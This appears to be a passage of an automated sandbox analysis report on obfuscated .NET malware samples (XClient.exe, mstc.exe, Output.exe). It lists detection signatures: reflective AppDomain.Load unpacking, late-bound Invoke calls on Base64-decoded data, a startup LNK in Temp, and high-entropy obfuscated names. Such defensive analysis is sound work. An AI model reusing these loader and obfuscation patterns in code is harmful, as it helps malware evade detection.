LNK file: ..\..\..\..\..\..\Local\Temp\mstc.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Output.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Output.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Output.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.0000000000911000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @fo.pdb source: build.exe, 00000003.00000002.2572212279.00000000006F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: build.exe, 00000003.00000002.2573255504.00000000009AD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.00000000009AD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2573255504.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HPZoHC:\Windows\System.ServiceModel.pdb source: build.exe, 00000003.00000002.2572212279.00000000006F7000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: XClient.exe.1.dr, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{F167lNHhHVQ1F1Js1bs45Kk9843.tssZCQlRUAUhD9cO0KC6yDCPg9b,F167lNHhHVQ1F1Js1bs45Kk9843.YcRgZ2iKHcMB5pcAjp5CKOwuR1F,F167lNHhHVQ1F1Js1bs45Kk9843._1FBBcT4pimB4mAGkh85VtpFbTD3,F167lNHhHVQ1F1Js1bs45Kk9843.s6BnsPAlxNey5WgejD4ZlpV1a19,XX3glvP8cBuW.sG7dSR21BXhY()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.1.dr, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fRJTg2TaKsAT[2],XX3glvP8cBuW.hRol2j1sJqyA(Convert.FromBase64String(fRJTg2TaKsAT[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: XClient.exe.1.dr, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { fRJTg2TaKsAT[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: mstc.exe.2.dr, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{F167lNHhHVQ1F1Js1bs45Kk9843.tssZCQlRUAUhD9cO0KC6yDCPg9b,F167lNHhHVQ1F1Js1bs45Kk9843.YcRgZ2iKHcMB5pcAjp5CKOwuR1F,F167lNHhHVQ1F1Js1bs45Kk9843._1FBBcT4pimB4mAGkh85VtpFbTD3,F167lNHhHVQ1F1Js1bs45Kk9843.s6BnsPAlxNey5WgejD4ZlpV1a19,XX3glvP8cBuW.sG7dSR21BXhY()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: mstc.exe.2.dr, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fRJTg2TaKsAT[2],XX3glvP8cBuW.hRol2j1sJqyA(Convert.FromBase64String(fRJTg2TaKsAT[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: mstc.exe.2.dr, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { fRJTg2TaKsAT[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{F167lNHhHVQ1F1Js1bs45Kk9843.tssZCQlRUAUhD9cO0KC6yDCPg9b,F167lNHhHVQ1F1Js1bs45Kk9843.YcRgZ2iKHcMB5pcAjp5CKOwuR1F,F167lNHhHVQ1F1Js1bs45Kk9843._1FBBcT4pimB4mAGkh85VtpFbTD3,F167lNHhHVQ1F1Js1bs45Kk9843.s6BnsPAlxNey5WgejD4ZlpV1a19,XX3glvP8cBuW.sG7dSR21BXhY()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fRJTg2TaKsAT[2],XX3glvP8cBuW.hRol2j1sJqyA(Convert.FromBase64String(fRJTg2TaKsAT[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, PU04YBr95a4s.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { fRJTg2TaKsAT[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: XClient.exe.1.dr, PU04YBr95a4s.cs	.Net Code: _1vUEaYbG8utM System.AppDomain.Load(byte[])
Source: XClient.exe.1.dr, PU04YBr95a4s.cs	.Net Code: WD6br03XixIG System.AppDomain.Load(byte[])
Source: XClient.exe.1.dr, PU04YBr95a4s.cs	.Net Code: WD6br03XixIG
Source: mstc.exe.2.dr, PU04YBr95a4s.cs	.Net Code: _1vUEaYbG8utM System.AppDomain.Load(byte[])
Source: mstc.exe.2.dr, PU04YBr95a4s.cs	.Net Code: WD6br03XixIG System.AppDomain.Load(byte[])
Source: mstc.exe.2.dr, PU04YBr95a4s.cs	.Net Code: WD6br03XixIG
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, PU04YBr95a4s.cs	.Net Code: _1vUEaYbG8utM System.AppDomain.Load(byte[])
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, PU04YBr95a4s.cs	.Net Code: WD6br03XixIG System.AppDomain.Load(byte[])
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, PU04YBr95a4s.cs	.Net Code: WD6br03XixIG

Source: build.exe.1.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886D3D2A5 pushad ; iretd	5_2_00007FF886D3D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF886F22316 push 8B485F91h; iretd	5_2_00007FF886F2231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886D3D2A5 pushad ; iretd	8_2_00007FF886D3D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886E5C2C5 push ebx; iretd	8_2_00007FF886E5C2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF886F22316 push 8B485F91h; iretd	8_2_00007FF886F2231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF886D1D2A5 pushad ; iretd	13_2_00007FF886D1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FF886F02316 push 8B485F93h; iretd	13_2_00007FF886F0231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FF886D1D2A5 pushad ; iretd	15_2_00007FF886D1D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FF886F02316 push 8B485F93h; iretd	15_2_00007FF886F0231B

Source: Output.exe

Static PE information: section name: .text entropy: 7.968642952514327

Source: Output.exe, bqTJRK6Z5XVigGrdoqLGfpdgwtCtJXbz0SZhbQBtVf6UG0Qza4IQdaf8K8vtOgs4CSYosglZeqFD7UBN8YZS55r21xU6f1T01U.cs	High entropy of concatenated method names: 'G2Xq2BOrn6eTW1uIzV9SHr1D8EIDaoT46cU6j0ChyK7Bpylo9e2f3v2qOBRSPViAgAhF3MxdZkPFlmukjMeKUByxXQs52hxILc', 'Q9aweo2uGERE6Daw3m4DHuLsuJOPaObz16aaffExEqYjiDtjVaMnaGRne5rnnsDN2DKXRDrAbPkb67wBVraLN2OKdrHqWxjtxz', 'W1eeHUKoFTzQhfAP4ap6HdO2juQfY0wwt9HtLe5iOLOperS1qrzH2nPnYUIrhBF8vN4SsrGw6rC25lKy2G3IUcZ1UtvrW63m0q', 'Y4uauZiaqJ0l1SjHMvZpvsAFvqmi92NnkEGglvoF1o0Ee7TDnuYLXRtlTZchGMtlIvbNNDsSMkLz0pVQ1NzUVUNd0fp87jqmQS', 'Cf7W3UbmYivk3s0rBE1J9DDpFsqBC0I6sLYcquON4zUWBPToY7r4T8qnaZUGLUaRKMJFIudyEIRSA6UjuErAaAZ9HcafLk6Cl1', 'NS2aHq2jtN79G0tfM7WqZ6LKrrQLQDyTLFFLqs6tPkWemr70vCneE6mmo6bjBee1oORDQkfzpHvJzRrnXRf', 'P0JSwLVzU2GiHbwZ12dSsiUT8QIh3XM4fL06QJUoGIwYSxwfqNunZgDqEqiPO8wHU2bzBMLUL0D4pqC2f0N', 'omzOMuM6VQDAY4w8V0Uw65jKPCXyI8Due768TI3nLCo4gFjjZmyWuvJMI7GVkeIMI0OmlyL4N5u4f2i6z29', 'UzliIYT1zhJkIVVdZLfkiAD1EynjPaqlnsUC4imVZuVxtOepRzRjbpjlvNa5LA25zhvz4Hn4xn83rHCEqbx', 'FECMcOIbGs72YXROnNDab5Efv1vYqOXe5Yz6QzHCQAZWDyuLRRjpXxVsUDbRao1a5rbdR8uCl0T0LXIy36P'
Source: Output.exe, Zg84v0c3wnzvPLl8aOGE9I9YJ6da2mPIfnCCnCZpjyLGfCSC8EJ3TGe61lEk9Gj6qAipb4y7exRIfhgar5cGdR5hWL7FIm1U2i.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QflgHev54oUHEamGmgfjQ4KogeqE7nJaLwTIEnhgEfWfw4cJJw2LL7Y1D1xbByee9opkehVvsjluwCuPBUb', 'RP0JdIaYtomcRF6GF8BtRjfCw5K4AKBjaYnq6YdQQ4B4Kqmk8GhVrIYxlzm5yvIw04mfa7z2MIMajwJPAZc', 'uz3dQfYKWkUmWkXDMmexzPRKWqF0U0Va8QV8IUQlxjncEH6SNp58RoMhdYYMq3S9GDCU9azstyOQEqoYuvI', '_0fBYrFq6HZgmWdd4Cto3Mc3HnUJVx1dzJwjmPD3Uvj80wzCTAI4NIdrx5BFTAvW7fXYYjQDTy11nhHeatOz'
Source: XClient.exe.1.dr, nyXJEoPksGbo.cs	High entropy of concatenated method names: '_90CbCI3rb36E', 'v0bcaYX8HCL7', 'tBKjrvcs7LQ5', 'm3c9loo1hcsAL0c9h7qPFQjzDP4SqQkLEpZTo', 'POhDWCqTFCYtbwpHJQgRPLw8kMGnCoN1iRiXA', '_78UynGx6BIfuCn2548USgOIi41m7UAmAeGxfT', 'XVLGuQnlLymjbGmyGb9ofAc58FuCC0B39lc1I', '_78qGx0BYMIMNSA5DY1L2VR4NxR8Gw7tJe8a1k', '_6bBfsx2DzvgHHV5au5EQh6hXHsH05knXHdO2M', 'XkteJQ0mWh3TeXoK2Hnq96Z18UN4m4a5vRs6o'
Source: XClient.exe.1.dr, vcc4WLgtdfjx.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'KG6h0h3Ot3wl', '_9wWwUTiAopvC4y5B0Rn9BzxUm1C6iy1ecg7vDuZMWTq01edFpAU33565H4y9jZ', 'LXDx4c0MPTo809fI3nzcIicm2S8r9IaPny35FUSTLXXi5tierEgJt3OYscaVIi', 'qMgnLZw5UiT96ga5iiFtipBDi4euVdIfOFhEJ3t65cSddbqzpdYJJbpkJoJ70A', '_68Zgv5KwZsnsPUGINj7iFNeT8m2k1qpo921JDwPo8zTAxl9QCXKZJ5L1rWD9bS'
Source: XClient.exe.1.dr, gcSrhoYVNytMrXBpS2pvbv2KzYZ.cs	High entropy of concatenated method names: 'Obv64yzMHim2HYLG6HY0a3IzFjH', '_46Db4hwpyyDIu7bhz5yQSabCJig', 'Aj7EAnBmq6xzTW3d14gDPSIwdWy', 'R61zHz6d8vEdpNdW0TNrokFRqeF', 'ziATNkYYr639adxs9FLi73wjIUz', '_9ijlxPv3nMudkj7dGEcZ7icr2rk', 'YWoSt0ZUOBs4O4B4uI0oszA8lZl', 'EAJhmPviiCdc069gtC2x4IZPran', 'f6Om9KFbAtEgCS4NCshPkKHPDrR', '_5expqfFdDaj0eILrfH8dLH5AYA9'
Source: XClient.exe.1.dr, 3dg67Hflw776.cs	High entropy of concatenated method names: 'hZxAuDj9Jj9u', '_3Qy4UFcEdlNY', '_2294zxCSCHCw', '_0qK9t4wKxrzL27CQ8s9ddLoNMLy2TP0lOtSOsLCBueT2g9tPonkeOrSwcuKiyJvm7GTnm4FIA388d', 'CIaB8V1yHt0van8khS3otNmkNzmGKUl4U1qjCzy35nCpW8MxhE8pOWLdCh4HLHFOqK6d8gKuQCJC6', '_605Mm7Dqz4qb22jKfbi5wxRyKOgt1MaraZ8DECKou8HEJb12l277PS3BtjSUYludx9AUvjG7UCjkd', 'BalXfAsSbbv1KLd0cEQooEQJITmeMwP4nucT8oU0VATvZs5nDbzovFWpmy7NzM4UGQnSj93kh4RaA', 'mFyFTS9D4DZRiDjhvIXzuvJ0JEvsIojyxmr2mYCUYkHUb10E6S9KtNTiy06m2sv8QSNUeB4tUEOaZ', 'ibarKDUxYGaLPTIAEoFN29e19WZ0VEN8aSJT9p9qm9vCrSHe8kQmB954VV8ZYfDBI0xOICbr5QGBY', '_9oTtgQOfb9P8R0YOkwG8eKSTScuxbBgmd0DcCIWJzbWhnTTAyOieQv5NalzfmT8vd1ikT2k3yIkJV'
Source: XClient.exe.1.dr, PU04YBr95a4s.cs	High entropy of concatenated method names: 'yqhOBFNaWtVN', '_1vUEaYbG8utM', 'SOaCsktq01bM', 'kwpQl75N71Cv', 'a177LTtfjdj8', 'StJPkX04XKHZ', 'TA526AudvkKD', 'NuJTJwyyoaLO', 'wR5HxepDMrgV', '_8wzcod38H1It'
Source: XClient.exe.1.dr, 610K9Nltakcz.cs	High entropy of concatenated method names: 'Pqfp1QEKvuwi', 'WUeIUtf5Gki4', 'wDqdy83OtonM', 's4hsqOzaMV34', 'buBWw3Wz3yd7', 'v6V29EEdAsms', 'ileE89Jp8nVH', 'PWBLTWfwgSjj', 'uE1L9czjStAO', 'frwZeOC1erIk'
Source: XClient.exe.1.dr, YYMQyP6IfH27.cs	High entropy of concatenated method names: 'dhLBNP0ACLMV', '_7IQYe0avXNImebriw7fP4DmJGOWOhj4iRUkhV8jPOsghyVe7fNu8fSXyd0g8Uq96iUeb3i5U5avHZ', 'TehLmWRSfstygnOgmEw9gTfnj6z5nlzqAaIrqiFLxvUcXScEdct2muqVLfe0psA3GErXJYRhYsuyU', 'PAApgbYmqG4f2lZVZYHXzGhPlVttY8U9LmrBhzBoEW1xnk10JcREbnBd5Tr6onX360uwGY6cGqHRW', 'sVV7mwXq8vfxBJsMAmGxl7Ci0XQMt4pDuQFCiaFAOnVWSWpM2xaylCyQCZ2C6D2vooMlXUeSVMNb6'
Source: XClient.exe.1.dr, vL9RsahRR1B6.cs	High entropy of concatenated method names: 'y25yBETh42sT', '_0qlBv9t0KJUy', 'NMP9ihl4T2o8OQsBH4biNba2ksOsQCZsTtD8Ds5JVBzdjnrffCjmboFApoicun', 'rbUrnXFYUitBXArghOGCXNN6ozoGQAcFHH6o2bivaKEqGn04DaqyKwsSfz6HHA', 'g0kAcJ7Uh7Ggeccj6LCjsJZMBx4VtBE5MsKkOUtcPlYCtPVmZS9bB2DkYfDzbj', 'ifTgjUrPmHAkKS7UVKE4KDoNM7OxjmeYhRY6UFlupsPXsvKaSpGhh9ubNmKkyq'
Source: XClient.exe.1.dr, lSFCDeEWkDjK.cs	High entropy of concatenated method names: 'T0A8k16WPwcI', 'p2fnYcn3Vaftl4NHq4fTedgyDq773UHhqiHV5PvBeY1L2GtxLJvsPpbuqZm2sf', 'fRkq4uaz2B79ApXOkjOrbEiYNFhUJ2OqUzyIDWw1VttGbmVOxtcVtDtqPTmAys', '_05aZNtPHALiNwgIcZu1AWtaPO6wLjzbf8Jg3Rz3RlXPVQnY4Ofj5RT5hmyHz91', 'UYKylSm4GOVEAWCVf2TdUECKdEf5NCVLLcHlrRQIR58Q5vZooE2stVvboWsVT8'
Source: XClient.exe.1.dr, HNtrMR4sP9Q0.cs	High entropy of concatenated method names: 'g4hq9XYocGMW', 'iSlj79l5MaqV', 'cxGPhkxPUBdK', '_8MLQMs9TKEd9', 'LyLvhvrUjQ05Q5w1NqZLfdzjEUx89GyNSqJKF6yqGyCzpiLCZkA0LDNOp09cfV', 'FOoHHptZM8UiM7izhx488tDStOUnZwU8mQF6Lc5xHegXWWQXgODu83KJamEUVn', 'Te6B0OL1zhJTqcHftQqytrb1I3zooAJw0UvZmDnkDzpnN3MvADkgsMka5MaHwG', 'WNOsxK98qxK55mu6VG7ceQluT73WOGflGhHzR5G2t9kw4diMV0mxFRlNA7Gw0j', 'kg2vUkLXpHbheQsJ5I9N6vO7GfYXiCJnZailyPQYEKTwYYF8wuKhPZusXyZvql', '_232HzJuThv49wpAFIIWIVqfp2HrViWOvayMK1Z2VQFj6ntJUMczEYAIGC78QqM'
Source: XClient.exe.1.dr, XX3glvP8cBuW.cs	High entropy of concatenated method names: 'Es9yP77RX55E', 'sVqdKFaIEHNp', '_4Omi1KNTHCXk', 'IAJiU1fZK0s6', 'H2YmA8TQhVCo', 'RfygCfn62f4g', 'yE2QnH4QdcEG', 'X80kyEGRxLyZ', 'BVKJLQeN9xKH', 'SaF63n2Nrs7x'
Source: XClient.exe.1.dr, im9wFYLfycZyeMaz6yif3VopE01.cs	High entropy of concatenated method names: 'I1QX0Dz5Ckuyi1hzB0yItN0j0vb', 'bFEUL1qcJU6qpkpMzyfR4yNp8C5', 'zHsBfnZ3fsXWsE0N069aCc61e94', 'DKR2ojeeYYgn9FrCQawjBqrTrTQ', 'jSoWCxMhpD4RCTCmlNjwj5YM30T', 'Ne1rshGuvXrjPyaBixOLKxwKT1B', 'znPtAOv9i1PYxra7hXbqzqspadR', 'ROI4hADy5aypzmh8yAsD141vCUS', 'MSkty4rXBUI4GpIxQX4k1YRBeID', 'izqAhnXsTG9Ao0Z6m96EpRvL24V'
Source: mstc.exe.2.dr, nyXJEoPksGbo.cs	High entropy of concatenated method names: '_90CbCI3rb36E', 'v0bcaYX8HCL7', 'tBKjrvcs7LQ5', 'm3c9loo1hcsAL0c9h7qPFQjzDP4SqQkLEpZTo', 'POhDWCqTFCYtbwpHJQgRPLw8kMGnCoN1iRiXA', '_78UynGx6BIfuCn2548USgOIi41m7UAmAeGxfT', 'XVLGuQnlLymjbGmyGb9ofAc58FuCC0B39lc1I', '_78qGx0BYMIMNSA5DY1L2VR4NxR8Gw7tJe8a1k', '_6bBfsx2DzvgHHV5au5EQh6hXHsH05knXHdO2M', 'XkteJQ0mWh3TeXoK2Hnq96Z18UN4m4a5vRs6o'
Source: mstc.exe.2.dr, vcc4WLgtdfjx.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'KG6h0h3Ot3wl', '_9wWwUTiAopvC4y5B0Rn9BzxUm1C6iy1ecg7vDuZMWTq01edFpAU33565H4y9jZ', 'LXDx4c0MPTo809fI3nzcIicm2S8r9IaPny35FUSTLXXi5tierEgJt3OYscaVIi', 'qMgnLZw5UiT96ga5iiFtipBDi4euVdIfOFhEJ3t65cSddbqzpdYJJbpkJoJ70A', '_68Zgv5KwZsnsPUGINj7iFNeT8m2k1qpo921JDwPo8zTAxl9QCXKZJ5L1rWD9bS'
Source: mstc.exe.2.dr, gcSrhoYVNytMrXBpS2pvbv2KzYZ.cs	High entropy of concatenated method names: 'Obv64yzMHim2HYLG6HY0a3IzFjH', '_46Db4hwpyyDIu7bhz5yQSabCJig', 'Aj7EAnBmq6xzTW3d14gDPSIwdWy', 'R61zHz6d8vEdpNdW0TNrokFRqeF', 'ziATNkYYr639adxs9FLi73wjIUz', '_9ijlxPv3nMudkj7dGEcZ7icr2rk', 'YWoSt0ZUOBs4O4B4uI0oszA8lZl', 'EAJhmPviiCdc069gtC2x4IZPran', 'f6Om9KFbAtEgCS4NCshPkKHPDrR', '_5expqfFdDaj0eILrfH8dLH5AYA9'
Source: mstc.exe.2.dr, 3dg67Hflw776.cs	High entropy of concatenated method names: 'hZxAuDj9Jj9u', '_3Qy4UFcEdlNY', '_2294zxCSCHCw', '_0qK9t4wKxrzL27CQ8s9ddLoNMLy2TP0lOtSOsLCBueT2g9tPonkeOrSwcuKiyJvm7GTnm4FIA388d', 'CIaB8V1yHt0van8khS3otNmkNzmGKUl4U1qjCzy35nCpW8MxhE8pOWLdCh4HLHFOqK6d8gKuQCJC6', '_605Mm7Dqz4qb22jKfbi5wxRyKOgt1MaraZ8DECKou8HEJb12l277PS3BtjSUYludx9AUvjG7UCjkd', 'BalXfAsSbbv1KLd0cEQooEQJITmeMwP4nucT8oU0VATvZs5nDbzovFWpmy7NzM4UGQnSj93kh4RaA', 'mFyFTS9D4DZRiDjhvIXzuvJ0JEvsIojyxmr2mYCUYkHUb10E6S9KtNTiy06m2sv8QSNUeB4tUEOaZ', 'ibarKDUxYGaLPTIAEoFN29e19WZ0VEN8aSJT9p9qm9vCrSHe8kQmB954VV8ZYfDBI0xOICbr5QGBY', '_9oTtgQOfb9P8R0YOkwG8eKSTScuxbBgmd0DcCIWJzbWhnTTAyOieQv5NalzfmT8vd1ikT2k3yIkJV'
Source: mstc.exe.2.dr, PU04YBr95a4s.cs	High entropy of concatenated method names: 'yqhOBFNaWtVN', '_1vUEaYbG8utM', 'SOaCsktq01bM', 'kwpQl75N71Cv', 'a177LTtfjdj8', 'StJPkX04XKHZ', 'TA526AudvkKD', 'NuJTJwyyoaLO', 'wR5HxepDMrgV', '_8wzcod38H1It'
Source: mstc.exe.2.dr, 610K9Nltakcz.cs	High entropy of concatenated method names: 'Pqfp1QEKvuwi', 'WUeIUtf5Gki4', 'wDqdy83OtonM', 's4hsqOzaMV34', 'buBWw3Wz3yd7', 'v6V29EEdAsms', 'ileE89Jp8nVH', 'PWBLTWfwgSjj', 'uE1L9czjStAO', 'frwZeOC1erIk'
Source: mstc.exe.2.dr, YYMQyP6IfH27.cs	High entropy of concatenated method names: 'dhLBNP0ACLMV', '_7IQYe0avXNImebriw7fP4DmJGOWOhj4iRUkhV8jPOsghyVe7fNu8fSXyd0g8Uq96iUeb3i5U5avHZ', 'TehLmWRSfstygnOgmEw9gTfnj6z5nlzqAaIrqiFLxvUcXScEdct2muqVLfe0psA3GErXJYRhYsuyU', 'PAApgbYmqG4f2lZVZYHXzGhPlVttY8U9LmrBhzBoEW1xnk10JcREbnBd5Tr6onX360uwGY6cGqHRW', 'sVV7mwXq8vfxBJsMAmGxl7Ci0XQMt4pDuQFCiaFAOnVWSWpM2xaylCyQCZ2C6D2vooMlXUeSVMNb6'
Source: mstc.exe.2.dr, vL9RsahRR1B6.cs	High entropy of concatenated method names: 'y25yBETh42sT', '_0qlBv9t0KJUy', 'NMP9ihl4T2o8OQsBH4biNba2ksOsQCZsTtD8Ds5JVBzdjnrffCjmboFApoicun', 'rbUrnXFYUitBXArghOGCXNN6ozoGQAcFHH6o2bivaKEqGn04DaqyKwsSfz6HHA', 'g0kAcJ7Uh7Ggeccj6LCjsJZMBx4VtBE5MsKkOUtcPlYCtPVmZS9bB2DkYfDzbj', 'ifTgjUrPmHAkKS7UVKE4KDoNM7OxjmeYhRY6UFlupsPXsvKaSpGhh9ubNmKkyq'
Source: mstc.exe.2.dr, lSFCDeEWkDjK.cs	High entropy of concatenated method names: 'T0A8k16WPwcI', 'p2fnYcn3Vaftl4NHq4fTedgyDq773UHhqiHV5PvBeY1L2GtxLJvsPpbuqZm2sf', 'fRkq4uaz2B79ApXOkjOrbEiYNFhUJ2OqUzyIDWw1VttGbmVOxtcVtDtqPTmAys', '_05aZNtPHALiNwgIcZu1AWtaPO6wLjzbf8Jg3Rz3RlXPVQnY4Ofj5RT5hmyHz91', 'UYKylSm4GOVEAWCVf2TdUECKdEf5NCVLLcHlrRQIR58Q5vZooE2stVvboWsVT8'
Source: mstc.exe.2.dr, HNtrMR4sP9Q0.cs	High entropy of concatenated method names: 'g4hq9XYocGMW', 'iSlj79l5MaqV', 'cxGPhkxPUBdK', '_8MLQMs9TKEd9', 'LyLvhvrUjQ05Q5w1NqZLfdzjEUx89GyNSqJKF6yqGyCzpiLCZkA0LDNOp09cfV', 'FOoHHptZM8UiM7izhx488tDStOUnZwU8mQF6Lc5xHegXWWQXgODu83KJamEUVn', 'Te6B0OL1zhJTqcHftQqytrb1I3zooAJw0UvZmDnkDzpnN3MvADkgsMka5MaHwG', 'WNOsxK98qxK55mu6VG7ceQluT73WOGflGhHzR5G2t9kw4diMV0mxFRlNA7Gw0j', 'kg2vUkLXpHbheQsJ5I9N6vO7GfYXiCJnZailyPQYEKTwYYF8wuKhPZusXyZvql', '_232HzJuThv49wpAFIIWIVqfp2HrViWOvayMK1Z2VQFj6ntJUMczEYAIGC78QqM'
Source: mstc.exe.2.dr, XX3glvP8cBuW.cs	High entropy of concatenated method names: 'Es9yP77RX55E', 'sVqdKFaIEHNp', '_4Omi1KNTHCXk', 'IAJiU1fZK0s6', 'H2YmA8TQhVCo', 'RfygCfn62f4g', 'yE2QnH4QdcEG', 'X80kyEGRxLyZ', 'BVKJLQeN9xKH', 'SaF63n2Nrs7x'
Source: mstc.exe.2.dr, im9wFYLfycZyeMaz6yif3VopE01.cs	High entropy of concatenated method names: 'I1QX0Dz5Ckuyi1hzB0yItN0j0vb', 'bFEUL1qcJU6qpkpMzyfR4yNp8C5', 'zHsBfnZ3fsXWsE0N069aCc61e94', 'DKR2ojeeYYgn9FrCQawjBqrTrTQ', 'jSoWCxMhpD4RCTCmlNjwj5YM30T', 'Ne1rshGuvXrjPyaBixOLKxwKT1B', 'znPtAOv9i1PYxra7hXbqzqspadR', 'ROI4hADy5aypzmh8yAsD141vCUS', 'MSkty4rXBUI4GpIxQX4k1YRBeID', 'izqAhnXsTG9Ao0Z6m96EpRvL24V'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, nyXJEoPksGbo.cs	High entropy of concatenated method names: '_90CbCI3rb36E', 'v0bcaYX8HCL7', 'tBKjrvcs7LQ5', 'm3c9loo1hcsAL0c9h7qPFQjzDP4SqQkLEpZTo', 'POhDWCqTFCYtbwpHJQgRPLw8kMGnCoN1iRiXA', '_78UynGx6BIfuCn2548USgOIi41m7UAmAeGxfT', 'XVLGuQnlLymjbGmyGb9ofAc58FuCC0B39lc1I', '_78qGx0BYMIMNSA5DY1L2VR4NxR8Gw7tJe8a1k', '_6bBfsx2DzvgHHV5au5EQh6hXHsH05knXHdO2M', 'XkteJQ0mWh3TeXoK2Hnq96Z18UN4m4a5vRs6o'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, vcc4WLgtdfjx.cs	High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'KG6h0h3Ot3wl', '_9wWwUTiAopvC4y5B0Rn9BzxUm1C6iy1ecg7vDuZMWTq01edFpAU33565H4y9jZ', 'LXDx4c0MPTo809fI3nzcIicm2S8r9IaPny35FUSTLXXi5tierEgJt3OYscaVIi', 'qMgnLZw5UiT96ga5iiFtipBDi4euVdIfOFhEJ3t65cSddbqzpdYJJbpkJoJ70A', '_68Zgv5KwZsnsPUGINj7iFNeT8m2k1qpo921JDwPo8zTAxl9QCXKZJ5L1rWD9bS'
Source: 2.2.XClient.exe.12971a78.0.raw.unpack, gcSrhoYVNytMrXBpS2pvbv2KzYZ.cs	High entropy of concatenated method names: 'Obv64yzMHim2HYLG6HY0a3IzFjH', '_46Db4hwpyyDIu7bhz5yQSabCJig', 'Aj7EAnBmq6xzTW3d14gDPSIwdWy', 'R61zHz6d8vEdpNdW0TNrokFRqeF', 'ziATNkYYr639adxs9FLi73wjIUz', '_9ijlxPv3nMudkj7dGEcZ7icr2rk', 'YWoSt0ZUOBs4O4B4uI0oszA8lZl', 'EAJhmPviiCdc069gtC2x4IZPran', 'f6Om9KFbAtEgCS4NCshPkKHPDrR', '_5expqfFdDaj0eILrfH8dLH5AYA9'
